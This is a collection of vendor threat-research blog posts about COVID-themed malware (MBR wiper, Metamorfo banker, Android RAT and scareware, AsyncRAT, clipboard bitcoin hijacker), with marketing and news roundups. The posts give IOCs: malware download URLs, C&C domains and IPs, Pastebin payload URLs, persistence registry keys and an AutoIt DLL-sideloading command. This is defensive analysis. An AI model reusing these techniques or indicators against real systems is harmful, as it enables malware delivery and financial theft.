CoronaVirus Trojan overwriting the MBR

/in /by

SonicWall Capture Labs Threat Research team recently found a new malware taking advantage of the CoViD19 pandemic which makes disks unusable by overwriting the MBR.

Infection cycle

Upon execution, a number of helper files are dropped inside a temporary folder:

One of the helper files named “coronavirus.bat”, which identifies itself as “coronovirus Installer” performs most of the setup work. It creates a folder named “COVID-19” where all the previously dropped helper files are moved. In order to go unnoticed, “COVID-19” folder is hidden. It further goes on to disable Windows Task Manager, User Access Control (UAC), disables options to add/modify wallpaper after changing the user’s current wallpaper. It also adds entries in registry for persistence.


Coronavirus.bat

The victim is notified of installation and reboot before the system is finally restarted.

run.exe creates a batch file named run.bat to ensure the registry modifications done by “coronavirus.bat” are kept intact besides facilitating execution of “mainWindow.exe”.

MainWindow.exe upon execution displays a window with two buttons showing structure of CoViD19 virus.

One of the button named “Remove virus” is non-functional. Upon clicking on the “Help” button it displays below image.

The sole functionality of the Update.VBS script file is to display below message window.

The other binary which starts execution after reboot is responsible for overwriting the MBR.
The original MBR is first backed up in the first sector before it is overwritten with new one.

MBR overwritten with the new code

Also on the sector 2 of the disk it copies below message

MBR and new code

Henceforth, the victim is displayed below message by the bootstrap code.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: KillMBR.Corn_A (Trojan)

 

Indicators Of Compromise (IOC):

  • DFBCCE38214FDDE0B8C80771CFDEC499FC086735C8E7E25293E7292FC7993B4C

 

This threat is also detected by SonicWALL Capture ATP.

Securing SaaS: Protect More, Manage Less

/0 Comments/in /by

It’s the start of a perfect day: You wake up, have your morning coffee followed by a delicious breakfast, and enjoy a traffic-free drive to work. Then you fire up your system to begin the frustrating and time-consuming process of evaluating threat detections in your organization’s different SaaS environments.

Between just Office 365 email, OneDrive, SharePoint Online, Box and Dropbox use, there are at least three different environments to review and verify protection against the latest breach of the day.

Staying on top of the constantly evolving threat landscape, coupled with the responsibility of securing and managing different SaaS applications across the organization, is a difficult and painstaking task. Using disparate solutions with siloed protections brings additional complexity and high potential for misconfigured policies, which increase your risk. To ensure protection against the latest SaaS threats, whether they be email or file storage, technology must keep up with changing trends.

SonicWall Cloud App Security (CAS) ensures this by introducing new features and enhancements throughout the year. Our initial release brought SonicWall protection into your SaaS environment, with advanced threat protection that spans across SaaS email and SaaS file storage in a single solution. Our February 2020 release, also known as CAS 2.6.0, expands protection capabilities and efficiencies even further.

Here are some of the new features and enhancements added to CAS:

Stop sensitive data leaks in outbound email

Data loss/leak prevention (DLP) is often an overwhelming concept for many organizations. Companies in every industry sector around the globe have seen sensitive data lost in almost every conceivable way. As a primary external communication method, email is a common source of exposure.

Preventing sensitive data such as personally identifiable information (PII), patient medical data, credit card information, or financial data from being leaked outside the organization requires constant vigilance. A wide range of high-profile data loss incidents has cost organizations millions of dollars in direct and indirect costs and has resulted in tremendous damage to brands and reputations. Whether the data was leaked accidentally, leaked intentionally or stolen, the business ramifications are the same.

Preventing sensitive data from being sent externally via email should be a critical component of any email security policy. The Office 365 email and Gmail DLP Protect (Inline) policies intercept and block outbound emails containing sensitive data before they can leave the organization. Using regulatory compliance-based templates, preventing data loss through email requires just a few easy clicks.

Identify credential compromise

Deviations from a user’s “normal” pattern of behavior, referred to as anomalies, can be indicative of credential compromise or an account takeover attack. Using AI for end-user behavior analysis (EUBA), CAS identifies and alerts on these deviations across your SaaS landscape. Just as AI evolves, feature capabilities do too.

Expanded alerting

When deviations in behavior are detected, admins need to know NOW—not the next morning when (or if) they look at a dashboard. We’ve expanded alerting for anomaly detections beyond the dashboard by offering CAS admins the ability to receive email alerts. Simply checking the “Email anomaly alerts to admins” option located in Configuration > Security App Store > Anomaly Detection > Configure is all it takes to get alerts sent right to your mailbox.

Exception management

In some situations, the activity flagged as anomalous is legitimate. Employees have emergencies, job roles change, or unusual patterns of business travel may occur. Often, the IT and Security teams are the last to know. If they find out at all, it’s usually through an alert that gets triggered based on a new user behavior.

Anomaly Exceptions offer additional flexibility by providing the ability to whitelist specific activity. While available whitelisting options are specific to the type of detection (e.g., geo suspicious, or other), the ability to whitelist for a defined time period or permanently is available for all detected activity types.

Increase efficiency with enhanced workflows and refined visibility

Managing tasks and exceptions can be part of everyday life for security admins — so efficient, streamlined management with state-of-the-art, cloud-native protection spanning your SaaS email and file storage apps is critical for organizations of any size. Several key workflows have been upgraded to increase efficiencies and simplify management even more.

Create anti-phishing whitelist or blacklist rules from within a security event

The process of creating whitelist and blacklist rules from scratch can be complex and cumbersome. We’ve made the process easier by including the ability to add rules from within a specific event. When you select one of the options, the fields are auto-populated using the event details. From there, you can modify or deselect fields as needed.

Use Mail Explorer to easily identify email messages based on specific criteria

The life of the security admin is rarely dull. When you want to find a specific email(s) sent or received by a user(s), you need to be able to do it quickly and simply. Mail Explorer brings the ability to easily identify and action specific emails with a few simple clicks. Using the tool provides the flexibility to not only quickly locate emails, but also to quarantine or blacklist.

Use dashboard customization for a refined view

Each organization, and each admin, is different. Adding the ability to save dashboard customizations as a user preference allows each admin a personalized view. Whether it’s updating a Security Event widget to display data from a custom query or isolating specific event types, the additional flexibility allows you to define what is important.

Increase compliance with read-only permissions

As administrators, we face the constant dilemma of determining who needs access to manage a product vs. who needs only data/reporting access. MySonicWall Workspace streamlines managing access permissions for SonicWall products, including CAS. Providing the ability to restrict permissions to a “read-only” view allows resources access to product data without the ability to modify the security controls or policies.

Fake Coronavirus site delivers Metamorfo banking Trojan

/in /by

SonicWall Capture Labs Threat Research team has come across another variant of Metamorfo banking trojan that tries to take advantage of the global crisis due to COVID-19 pandemic.

This malware was first seen 2 days ago and the domain “masry-corona” that hosts this malware was also created recently with “corona” in the domain name to attract people looking for information regarding coronavirus.

Infection Cycle:

 

When the malicious web page “hxxps://masry-corona.com/TestCoAPP.zip” is visited, the Zip archive “TestCoApp.zip” gets downloaded onto the victim’s device, it is an archive of an MSI file named “CIADXV95270MBNW.msi”. Once clicked, it gets installed with the help of MsiExec.exe, a built-in Windows Installer.

 

This MSI file has 48 streams in it and the stream “!_StringData” has the downloader JavaScript code obscured with huge garbage strings.

 

After extracting and de-obfuscating the !_StringData, we see the below JavaScript code, that downloads the malicious payload.

 

When the javascript code within the MSI file gets executed, it downloads a ZIP file from the URL  “hxxp://la42.website/pro2/comprobante_771124.zip” using WinHttpRequest. ZIP file contains three files, it then gets decompressed into a 8-letter random string folder “bxkwuRkn” under “C:\ProgramData”. Also, the three files are renamed with 8-letter random strings, which were “qhQRAMSY.exe”, “8SkHjLCy” and “tfg74JRL.dll”.

 

qhQRAMSY.exe is a legitimate AutoIt script execution program, whose original name was “AutoIt3.exe”.

 

The actual malicious payload “tfg74JRL.dll” is a variant of Metamormfo. Metamorfo is a malware family that was observed targeting the customers of online financial institutions

 

It gets executed with the command: “C:\\programData\\qhQRAMSY.exe  C:\\Programdata\\bxkwuRkn\8SkHjLCy C:\\Programdata\\bxkwuRkn\tfg74JRl.dll“. AutoIt, a whitelisted process was being used to load the malicious dll to evade from antivirus detection.

 

Later, a shortcut file (LNK) was created with the above command in the Windows Start Menu folder to persist after system reboots.

 

It then modifies several registry key values to disable “AutoComplete”, “Use FormSuggest”, “FormSuggest Passwords”, “FormSuggest PW Ask” under the “HKCU\Software\Microsoft\Internet Explorer\Main”, and “AutoSuggest” under the “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete”. This allows the malware keylogger function to record the victim’s input.

 

It connects with the command-and-control (C&C) server informing that it’s been has been infected. The below command “<|LSTU|>” is sent to the server, functioning like a heartbeat.

 

This variant also starts the Volume Shadow Copy Service (VSS) to create a shadow copy (system restore point) with malicious files in it. Volume Shadow Copy Service is a technology included in Microsoft Windows that can create backup copies or snapshots of computer files or volumes, even when they are in use.

Most antivirus software do not scan volume shadow copies for malware or other security threats. That could be why this malware tries to persist through system restore points and as well to evade from antivirus detections. 

 

With VSS Service, a shadow copy gets created after the victim’s machine gets infected.

 

As we are responding to combat the coronavirus (COVID-19) outbreak in the real world, we must also focus on cyber hygiene.

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signatures:

GAV: 8676 Metamorfo.DN

This threat is also detected by SonicWALL Capture ATP w/RTDMI.

IOCs:

URLs:
hxxps://masry-corona.com/TestCoAPP.zip
hxxp://masry-corona.com/TestCoAPP.zip
hxxp://la42.website/pro2/comprobante_771124.zip
hxxp://la42.website/pro2/comprobante_771124.zip

SHA-256:
24e3d85865e6046e747f993dfc3b732d3922e7a1f9a382198cf699a06d83a51f (Zip)
5d413bf1c985529c38399323a7c2698371319332241b4e9bf55a47b51857aca8 (MSI)
237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d (exe)
5160557cac92e174b76a596592592b3e4eac3c9c65dd4d57c91a38c0d0b8f0f4 (dll)
5e07234588a7af03453c082a23f03e41418a1f42fea9c5884f19d8df16ad0fa2 (script)

Domain:
masry-corona.com
la42.website

IP Address:
192.3.157.116
134.0.10.213

Cybersecurity News & Trends – 03-27-20

/0 Comments/in /by

This week, cybersecurity experts band together to tackle coronavirus-related cyberthreats, SonicWall traces scareware, and healthcare systems weather cyberattacks.

SonicWall Spotlight

How to Stay Cyber-Secure While Working From Home – Raconteur

  • Picking up on a recent SonicAlert about scareware Raconteur talks to SonicWall’s Terry Greer-King about the rise in Coronavirus-related malware as more and more people work from home.

Podcast #113 – Uber Knowledge

Elite Hackers Target WHO As Coronavirus Cyberattacks Spike – Information Security Buzz

  • With hackers reported to have tried to break into the World Health Organization earlier this month, SonicWall’s Terry Greer-King talks to Information Security Buzz about the ever-changing cyber threat landscape, explaining that real-time defense mechanisms are needed to deal with attacks that can also change in real-time.

Cybersecurity News

Coronavirus Hackers Face the Wrath of the Cybersecurity Community – Verdict

  • As COVID-19 continues to spread around the planet, cybersecurity professionals have started a grassroots fight against cybercriminals taking advantage. A group of over 600 expert volunteers is working to map and takedown the attack infrastructure, handing over to law enforcement anyone they can specifically identify.

Malware Disguised as Google Updates Pushed via Hacked News Sites – Bleepin Computer

  • Hacked corporate sites and news blogs running using the WordPress CMS are redirecting people who visit the websites to a fake Google-update phishing page that eventually installs malware on their computers.

Senator Sounds Alarm on Cyber Threats to Internet Connectivity During Coronavirus Crisis – The Hill

  • Senator Mark Warner, vice chairman on the Senate Intelligence Committee, is asking companies like Google to ensure that the cybersecurity on their products are absolutely of the highest possible standard, emphasizing that “it is… imperative that consumer Internet infrastructure not be used as attack vectors to consumer systems and workplace networks accessed from home.”

Hacker Selling Data of 538 Million Weibo Users – ZDNet

  • The personal details of more than 538 million users of Chinese social network Weibo have been put up for sale on the dark web. Personal details include real names, site usernames, gender, location, and some phone numbers, but not passwords.

Paris Hospitals Target of Failed Cyber-Attack, Authority Says – Bloomberg

  • The Paris hospital authority, AP-HP, was the target of a thwarted cyberattack on March 22, according to France’s cybersecurity agency.

Singapore Most Exposed, but Also Most Prepared in Cybersecurity: Deloitte – ZDNet

  • A new study by Deloitte has found that Singapore, with its high internet adoption rate, is the modern city that is both the most exposed to cyber threats and also most prepared to deal with them.

In Case You Missed It

How to Simplify Endpoint Security

/0 Comments/in /by

As an extension of our last blog on evaluating endpoint protection solutions, I would like to talk about how SonicWall Capture Client can deliver advanced endpoint security that meets the needs of both your organization and the users with the endpoints.

Managing endpoints and securing them across various environments is a well-known challenge for SecOps professionals. If you do not have a solution that provides visibility and reduces your response time during an outage or business disruption, you’ll spend a good chunk of your day in troubleshooting and mitigating.

In this post, we will discuss how we can use SonicWall Capture Client to manage your endpoints and save time implementing the features provided by the solution.

  1. Don’t worry, it’s always onMost of the endpoint solutions on the market rely on cloud connectivity. Some are based on reputation or similarities to known malware. With SonicWall Capture Client, all the intelligence and AI models are baked into the low-footprint SentinelOne engine that automatically quarantines and mitigates malicious activity on the endpoint.

    This process works in tandem with the Capture Advanced Threat Protection (ATP) cloud sandbox service, which delivers off-box analysis for an instant “good-or-bad” verdict. The result? Users can continue working securely and uninterrupted without worrying about potential compromise.

  2. One-click rollback for easier remediationWith malware and ransomware adopting smarter techniques to penetrate your security perimeter, behavioral analysis is more likely to get triggered as a defense mechanism. However, there is no 100% guarantee. If all layers are breached by the 1%, it generally hits the radar when the user reports the problem. By this time, it’s often too late. You will need to come up with a response plan and quickly remediate the threat.

    With SonicWall, you are a click away from rolling back the impact, saving a lot of time and cycles around coordinating with the user, and allowing the user to get back to completing their tasks without any further interruption.

  3. Seamless endpoint managementThe early days of endpoint security implementation used a zone-based approach. The idea behind zones is to allow SecOps to configure different policies based on location, usually because of on-premise management limitations.

    But ransomware is location-agnostic — and you need consistent security following the endpoint. By deploying the SonicWall agent (leveraging SentinelOne’s low-memory footprint) across your endpoint assets, you don’t need to worry about this. With a cloud-based management console, endpoint policies are now applied to every endpoint consistently with the ability to define granular user/device-based exceptions.Moreover, by using the cloud-based Capture ATP sandbox service, endpoints can take full advantage of protection without depending on on-premise appliances.

  4. What you see is what you defendOnce SonicWall Capture Client is deployed across your assets, each agent automatically reports on all installed applications. Unlike other solutions, this functionality is not dependent on ever running the actual application.

    From the management console, you can see the onboarded endpoints and the applications that are on the machine, what processes are running, etc. Reports can be scheduled and emailed to recipients of your choice with executive-level insights. Further details can be leveraged from the report to implement any corrective measures that are needed to address the same.

  5. Automate & orchestrate with APIsWith threats increasing at exponential rates, there is a big bang effect that is being observed in the threat landscape.

    Cybercriminals are getting craftier and leveraging automation techniques to evade traditional ways of getting detected. This gives them the ability to process more data in less time, jumping from database to database or network to network with relative ease. If enterprises try to eliminate threats using manual processes or ad-hoc hunts, they are at a severe disadvantage.

    SonicWall Capture Client has been built with an API-first approach, so anything the technology does in isolation can also be orchestrated and integrated, creating unified and proactive workflows with other security tools. This allows the organizations to be one step ahead of the attacks and protect environments from other threats.

Read-to-Go Security Bundle Includes Endpoint Protection

To help organizations cost-effectively build their work-from-home workforces, SonicWall is making its remote access products and services, endpoint protection and cloud application security solutions available to both new and existing customers via deeply discounted rates.

These packages were bundled to include everything needed to protect employees outside the network:

  • Free Secure Mobile Access (SMA) virtual appliance
  • Aggressive discounts on Capture Client endpoint protection
  • Aggressive discounts on Cloud App Security
  • Aggressive discounts on support contracts and Remote Implementation Services when you bundle a virtual appliance
  • New 30- and 60-day VPN spike licenses for existing SMA 100 and 1000 series customers

Fake CoronaTracker app for Android ships with malicious Banker, Spyware and RAT capabilities

/in /by

SonicWall Capture Labs Threat Research team has been monitoring potential malicious apps using the CoronaVirus/Covid-19 theme. We have published a number of blog posts on this topic in the past few days. We identified another Android malware using the CoronaVirus theme, this malware comes with a multitude of capabilities, which include Remote Access Trojan (RAT) spyware that targets banking app

The malware goes by the Turkish name “Corona Takip”, which when translated in English means Corona Follow. This malware poses as a Covid19 Tracker app for mobile devices by copying the icon used by Corona Tracker. Corona Tracker is a web application that tracks the latest development of Coronavirus. The source is hosted on Github.

 

On installation and execution, to the victim the app appears to open a mobile version of the site shown above:

But in the background the malware starts its nefarious activities.

 

Network Communication

Once executed, the malware communicates with the Command and Control (C&C) server aymyapi.com. It uses POST to send encoded information to two php pages a14.php and a4.php:

Within the code we observed a number of .php pages, but during our analysis we did not encounter further communication:

 

Configuration File

Upon execution a configuration file set.xml is saved locally in shared_prefs folder:

 

Remote Access Trojan (RAT) functionality

This malware contains capabilities of a RAT, it can allow the attacker to issue commands and control the infected device remotely. We found the following commands present in the code:

  • downloadfile
  • deletefilefolder
  • opendir
  • startscreenVNC
  • stopscreenVNC
  • **noconnection**

 

Hardcoded Commands

A number of commands are present in configuration file set.xml (highlighted earlier) and can be traced back to the code:

Few dangerous commands present in both the code and config file are listed below. These commands have the capability to spy and extract critical personally identifiable information from the infected device:

  • keylogger
  • gps
  • spamSMS
  • VNC_Start_New
  • startRecordingSound
  • htmllocker

One of the commands is textPlayProtect and the value against it is “The system is not working properly, please disable Google Play Protect!”. We found traces in the code where the malware contains alerts about the user trying to enable Play Protect as well as alert when Play Protect is disabled:

There are additional alert messages when critical actions are performed:

 

Targeted banking apps

This malware keeps track of more than 100 apps and has capabilities to display fake screen to steal credentials. Majority of the apps are banking apps; overall they fall in the following categories:

  • Shopping
  • Banking
  • Crypto
  • Stock Trading

Miscellaneous observations

We observed alert messages in multiple languages indicating the malware writers aspire to spread this threat in different parts of the world. We spotted the following country codes:

  • United States (US)
  • Russia (RU)
  • Turkish (TR)
  • German (DE)
  • Italy (IT)
  • France (FR)
  • Ukraine (UA)

 

We observed hardcoded link for the coronatracker website, this can be replaced by a different website to change the theme of the malware:

 

The C&C domain contacted by the malware – aymyapi.com – was registered recently according to its Whois information:

  • Created: 2020-03-17 15:44:59 UTC
  • Expiration: 2021-03-17 15:44:59 UTC

This indicates that this version of the malware was created recently to capitalize on the rising global awareness about CoronaVirus. Another example of malware writers trying to further their malicious creations using the popularity of the CoronaVirus pandemic.

 

Overall, this is another instance illustrating an Android malware disguised as a CoronaVirus related app. As described in our previous blogs, malware writers are misusing the panic state caused by the pandemic to further their malicious goals.

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: AndroidOS.CoronaTracker.BNK (Trojan)
  • GAV: AndroidOS.CoronaTracker.TU (Trojan)

Indicator of Compromise(IOC):

  • b7070a1fa932fe1cc8198e89e3a799f3

List of targets:

  • es.cm.android
  • es.cm.android.tablet
  • apps.com.app.utils
  • com.DijitalSahne.EnYakinHalkbank
  • com.Plus500
  • com.SifrebazCep
  • com.akbank.android.apps.akbank_direkt
  • com.akbank.android.apps.akbank_direkt_tablet
  • com.akbank.android.apps.akbank_direkt_tablet_20
  • com.akbank.softotp
  • com.albarakaapp
  • com.albarakaapp
  • com.amazon.mShop.android.shopping
  • com.android.chrome
  • com.android.settings
  • com.android.system
  • com.android.systemui
  • com.android.vending
  • com.bankia.wallet
  • com.bestbuy.android
  • com.binance.dev
  • com.binance.odapplications
  • com.bitcoin.ss.zebpayindia
  • com.bitfinex.bfxapp
  • com.bitmarket.trader
  • com.blockfolio.blockfolio
  • com.btcturk
  • com.coin.profit
  • com.coinbase.android
  • com.coins.bit.local
  • com.coins.ful.bit
  • com.crypter.cryptocyrrency
  • com.db.mm.norisbank
  • com.db.pwcc.dbmobile
  • com.denizbank.mobildeniz
  • com.ebay.mobile
  • com.edsoftapps.mycoinsvalue
  • com.finansbank.mobile.cepsube
  • com.fragment.akbank
  • com.garanti.cepbank
  • com.garanti.cepsubesi
  • com.garantibank.cepsubesiro
  • com.garantiyatirim.fx
  • com.twitter.android
  • com.ing.mobile
  • com.ingbanktr.ingmobil
  • com.jackpf.blockchainsearch
  • com.jamalabbasii1998.localbitcoin
  • com.kryptokit.jaxx
  • com.kuveytturk.mobil
  • com.localbitcoins.exchange
  • com.localbitcoinsmbapp
  • com.magiclick.FinansPOS
  • com.magiclick.odeabank
  • com.mal.saul.coinmarketcap
  • com.matriksdata.finansyatirim
  • com.matriksdata.ziraatyatirim.pad
  • com.matriksmobile.android.ziraatTrader
  • com.mobillium.papara
  • com.moneybookers.skrillpayments
  • com.moneybookers.skrillpayments.neteller
  • com.monitise.isbankmoscow
  • com.mycelium.wallet
  • com.paypal.android.p2pmobile
  • com.paypal.android.p2pmobile
  • com.plunien.poloniex
  • com.portfolio.coinbase_tracker
  • com.pozitron.albarakaturk
  • com.pozitron.albarakaturk
  • com.pozitron.iscep
  • com.pozitron.vakifbank
  • com.redrockdigimark
  • com.softtech.isbankasi
  • com.softtech.iscek
  • com.targo_prod.bad
  • com.teb
  • com.thunkable.android.manirana54.LocalBitCoins_unblock
  • com.tmobtech.halkbank
  • com.tnx.apps.coinportfolio
  • com.unocoin.unocoinmerchantPoS
  • com.unocoin.unocoinwallet
  • com.vakifbank.mobile
  • com.veripark.ykbaz
  • com.vipera.ts.starter.QNB
  • com.vkontakte.android
  • com.ykb.android
  • com.ykb.android.mobilonay
  • com.ykb.androidtablet
  • com.ykb.avm
  • com.yurtdisi.iscep
  • com.ziraat.ziraatmobil
  • com.ziraat.ziraatmobil
  • com.ziraat.ziraattablet
  • tr.com.hsbc.hsbcturkey
  • tr.com.sekerbilisim.mbank
  • tr.com.tradesoft.tradingsystem.gtpmobile.halk
  • wos.com.zebpay
  • mobile.santander.de
  • finansbank.enpara
  • finansbank.enpara.sirketim
  • tr.com.hsbc.hsbcturkey
  • tr.com.sekerbilisim.mbank
  • tr.gov.turkiye.edevlet.kapisi
  • eu.unicreditgroup.hvbapptan
  • io.getdelta.android
  • de.schildbach.wallet
  • piuk.blockchain.android
  • info.blockchain.merchant
  • zebpay.Application
  • xmr.org.freewallet.app

 

Android CoronaVirus Ransomware comes bundled with decryption code

/in /by

With the sudden spike in CoronaVirus related threats it is no surprise that recent ransomware uses the same name. SonicWall Capture Labs Threats Research team observed an Android ransomware that uses scare tactics to make a quick buck.

 

Sample specifics

Application Name: Coronavirus Tracker

Package Name: com.device.security

Md5: d1d417235616e4a05096319bb4875f57

 

The permissions requested by the malware application are chosen to enable/start key functionality of the malware:

  • “Receive boot completed”  has been included to enable the service RebootReceiver
  • “Request ignore battery optimizations” has been included to ensure that the malware is not hibernated into a low power state to conserve battery

Infection Cycle

This ransomware spreads by posing itself as a CoronaVirus Tracker:

Once installed and executed it requests for Accessibility Services and Device Admin permission:

 

After a few minutes we are shown the ransom screen:

 

Behind the scenes

The ransom screen can be intimidating at first viewing, as there are threats to leak images and videos from the device if the ransom is not honored. The ransomware screen is picked from a hardcoded URL in the code which re-directs to a Pastebin page:

Even though this malware appears to be a ransomware, in reality this is just a scareware – a malware that uses scare tactics to coax the victim into paying a ransom. There is no evidence of any sort of file encryption or any way to steal/post the images or videos from the infected device.

The malware author demands payment in exchange of a decryption code. However checking the code revealed the presence of this decryption code in clear text:

On entering this code 4865083501 we saw the message “Congrats. You Phone is Decrypted”.

 

Success Rate

We checked the Bitcoin wallet address mentioned in the ransom note and confirmed that there is not presently significant traffic to this wallet. This indicates that the malware authors have not yet had significant success with this ransomware:

A note of Caution

For anyone who has a device infected by this ransomware, the decryption code is 4865083501. After entering this code the app disappears from the app drawer. This gives the user the impression that the app is no longer on the device. But in reality the app keeps running in the background and can be seen in the list of downloaded apps on the device:

Uninstalling the app is not straightforward because of the Device Admin privilege, and the Uninstall button appear greyed out. The only way to remove the app is to first revoke the Admin rights given to this app via Security ->Device Administration -> Untick Coronavirus Tracker.

 

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: AndroidOS.Decrypt.RSM (Trojan)
  • GAV: AndroidOS.CoronaTracker.RSM (Trojan)

 

Indicators Of Compromise (IOC):

  • d1d417235616e4a05096319bb4875f57

Found another Remote Access Trojan pretending to be Documentation on Covid19 Response and Preparedness

/in /by

As the Corona virus pandemic unfolds, the Sonicwall Capture labs  Research team also observe an increasing amount of malicious software actively exploiting this crisis. As we have previously reported, we have seen different malware families using this tactic from ransomware, to infostealers, to phishing scam trying to scheme people who are in constant search for news and updates from around the world.

This week, we have seen a malware family pretending to be information regarding the virus and targeting administrators of institutions for higher education.

Infection Cycle

The Trojan arrives in an archive possibly distributed via spam. Within that archive is a file with the following filename and icon:

  • Interim Guidance for Administrators of US Institutions of Higher Education to Plan, Prepare and Respond to CoViD19.exe

 

In fact the official statement from CDC (Centers for Disease Control and Prevention) concerning the above can be found on this official webpage which has the same title.

Upon execution it creates a copy of itself in the following directory:

  • %Appdata%\Roaming\shost.exe

To ensure persistence it adds the following to the registry:

  • HKCU/Software\Microsoft\Windows\CurrentVersion\Run  shost   %Appdata%\Roaming\shost.exe

It then makes a DNS query to peacelist [dot] ignorelist[dot]com:

And then makes periodic connections to a remote server using ports 5505, 7707, 8808.

At the time of analysis, no data has been exchanged, received nor sent. But certainly this demonstrated its ability to phone home and possibly receive further instructions from the remote server.

During this crisis, we urge our users to only use official and reputable websites as their source of information and news. Always be vigilant and cautious when installing software programs particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Async.RAT (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions

 

 

 

Caution: Beware while copy & pasting Bitcoin address for financial transactions

/in /by

Sometimes even a simple looking code can cause a lot of damage. SonicWall Threats Research team found a new technique used by malware authors that can silently redirect the financial transactions made by a victim to the malware author’s account. SonicWall RTDMI ™ engine has recently detected a malware which examines the clipboard content for the bitcoin address pattern. If malware finds the bitcoin address, it changes the current bitcoin address to malware author’s bitcoin address in the clipboard content.

Due to the length of the bitcoin address and its alphanumeric complexity, users usually prefer to copy and paste the bitcoin address. In this case on a malware compromised machine, the malware works as a man in the middle by switching clipboard content between copy & paste.

The malware’s infection chain involves delivery of a VBScript file inside an archive, as an email attachment. The malware execution involves three layers of VBScript execution which leads to execute the PowerShell script as final payload.

 

First Layer VBScript:

The malware uses Living Off The Land (LOTL) tactic to stay low while executing on victim’s machine. The VBScript uses mshta.exe to execute second layer VBScript hosted remotely at Pastebin Unified Resource Locator (URL) “http:\\pastebin.com\raw\Mf2k0MGb”. The mshta.exe is considered a member of Living Off The Land Binaries (LOLBins) which are used to bypass application whitelisting defenses:

 

Second Layer VBScript:

The second layer VBScript again uses mshta.exe to execute third layer VBScript hosted remotely at Pastebin URL “http:\\pastebin.com\raw\x3cbyh8u”. The malware also makes persistence entries to the victim’s machine:

 

Persistence:

The malware schedules a task to run every one hour, which executes thirds layer VBScript from the Pastebin URL “http:\\pastebin.com\raw\x3cbyh8u” using mshta.exe:

The malware also makes registry entries into “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” to ensure its executes on system start:

 

Third Layer VBScript:

Third layer VBScript executes the final payload which is a PowerShell script:

 

PowerShell Script:

The PowerShell code is pretty simple but very effective in terms of causing destruction. The malware runs in a infinite loop and examines the clipboard content for bitcoin address pattern, which will be found in case the user has copied bitcoin address to make any transaction. Once the bitcoin address is found in the clipboard, the malware replaces that bitcoin address to malware author’s bitcoin address which is picked from the list of five bitcoin addresses owned by the malware author. The malware uses Get-Clipboard and Set-Clipboard cmdlets to retrieve and change the clipboard content. These cmdlets are supported after PowerShell 7 onwards:

 

The file is detected by only a few security vendors on popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential:

 

Evidence of the detection by RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Cybersecurity News & Trends – 03-20-20

/0 Comments/in /by

This week, coronavirus changes the cybersecurity landscape, and SonicWall examines how to expand your remote workforce.

SonicWall Spotlight

How to Protect Your Business During a Global Health Crisis – SonicWall Blog

  • As the world works to stop the spread of coronavirus (COVID-19), IT organizations everywhere are adjusting to the technology and security challenges faced due to the sudden need to support a fully remote workforce. SonicWall presents the best practices for expanding your remote workforce, securely.

Threats Across the World: Lessons from Three Years of Threat Reporting – CBR Online

  • SonicWall’s Terry-Grear King details the changing cyber threat landscape over the past three years, concluding that the only viable solution to ever changing threats is ever changing defensive measures and constant vigilance.

Here’s What to Look for in a Work-From-Home VPN – Fortune

  • SonicWall CEO Bill Conner talks to Fortune about the recent scramble for VPN offerings as they examine what to look for in a VPN if you need to work from home in the current climate.

Don’t Forget Viruses, the Computer Kind – The New Stack

  • With so much news airtime dedicated to the spread of coronavirus, New Stack reminds readers that viruses of the computer kind have not gone away, referring to malware figures from the SonicWall 2020 Cyber Threat Report to do so.

Review: Small Businesses Get Big Protection With SonicWall Cloud App Security Biz Tech Magazine

  • SonicWall’s Cloud App Security gets a spin by Biz Tech Magazine who consider it simple enough for non-tech pros to set up and use while also proactive in finding and preventing malware propagation across the cloud.

Cybersecurity News

Thousands of COVID-19 Scam and Malware Sites are Being Created on a Daily Basis – ZDNet

  • As several SonicWall SonicAlerts have detailed, cybercriminals have wasted no time in taking advantage of the COVID-19 crisis, creating thousands of scam and malware sites on a daily basis. According to one researcher 3,600 new domains that contain the “coronavirus” term were created between March 14 and March 18.

DDoS Attack Trends Reveal Stronger Shift to IoT, Mobile – Dark Reading

  • Distributed denial-of-service (DDoS) attacks remain a popular attack vector but new research is finding that that cybercriminals are increasingly turning to mobile and Internet of Things (IoT) technologies to launch their campaigns. With the growth of 5G researchers anticipate attackers will continue to find ways to leverage the IoT to launch these attacks.

Senator Calls for Cybersecurity Review at Health Agencies After Hacking Incident – The Hill

  • Following an attempted hack of the Department of Health and Human Services, at a time when it is under great strain, Senator Michael Bennet of Colorado calls for health agencies to allow the Cybersecurity and Infrastructure Security Agency (CISA) to complete a full cybersecurity review of their systems.

France Warns of new Ransomware Gang Targeting Local Governments – ZDNet

  • France’s cybersecurity agency, CERT, has issued an alert warning of a new active ransomware gang using a new version of the Mespinoza ransomware strain. The gang has been detected actively targeting local government systems, with the agency receiving reports of multiple infections.
And Finally

Skimming Code Battle on NutriBullet Website may Have Risked Customer Credit Card Data – ZDNet

  • A tough week around the world or not, nothing stops Magecart gangs from chalking up another victim, this time Nutribullet, who had the card skimming code on their website from mid-February until as late this week.

In Case You Missed It